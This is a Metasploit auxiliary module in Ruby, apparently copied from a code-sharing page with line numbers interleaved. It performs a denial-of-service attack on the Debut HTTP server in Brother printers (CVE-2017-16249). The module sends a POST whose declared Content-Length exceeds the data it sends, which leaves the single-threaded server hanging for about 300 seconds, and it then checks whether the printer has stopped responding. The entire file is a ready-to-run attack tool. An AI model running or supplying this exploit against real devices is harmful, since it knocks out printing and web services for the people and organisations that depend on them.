Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Brother Debut http Denial Of Service',
13
      'Description'    => %q{
14
        The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
15
        of Service (DoS) condition via a crafted HTTP request.  The printer will be
16
        unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
17
        printer will start responding again.
18
      },
19
      'License'        => MSF_LICENSE,
20
      'Author'         =>
21
      [
22
        'z00n <[email protected]>', # vulnerability disclosure
23
        'h00die' # metasploit module
24
      ],
25
      'References'     => [
26
        [ 'CVE', '2017-16249' ],
27
        [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730']
28
      ],
29
      'DisclosureDate' => '2017-11-02'))
30
  end
31

32
  def is_alive?
33
    res = send_request_raw({
34
      'method'	=> 'GET',
35
      'uri'	=> '/',
36
    },10)
37

38
    return !res.nil?
39
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
40
    print_error("Couldn't connect to #{peer}")
41
  end
42

43
  def dos
44
    # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
45
    # for the rest of the data, which never comes, and times out after ~300 seconds.
46
    data = Rex::Text.rand_text_alphanumeric(40)
47
    send_request_cgi({
48
      'method' => 'POST',
49
      'uri'    => '/',
50
      'data'   => data, #'asdasdasdasdasdasdasd',
51
      'headers' => {
52
        # These are kept here since they were in the original exploit, however they are not required
53
        #'Host' => 'asdasdasd',
54
        #'User-Agent' => 'asdasdasd',
55
        #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
56
        #'Accept-Language' => 'en-US,en;q=0.5',
57
        #'Referer' => 'asdasdasdasd',
58
        #'Connection' => 'close',
59
         #'Upgrade-Insecure-Requests' => 1,
60
        #'Content-Type' => 'application/x-www-form-urlencoded',
61
        'Content-Length' => data.length + rand(10) + 10 #42
62
        }
63
      })
64
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
65
    print_error("Couldn't connect to #{peer}")
66
  end
67

68
  def run
69
    time = Time.new
70
    print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.")
71
    dos
72

73
    # Check to see if it worked or not
74
    if is_alive?
75
      print_error("#{peer} - Server is still alive.")
76
    else
77
      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
78
    end
79
  end
80
end
81

82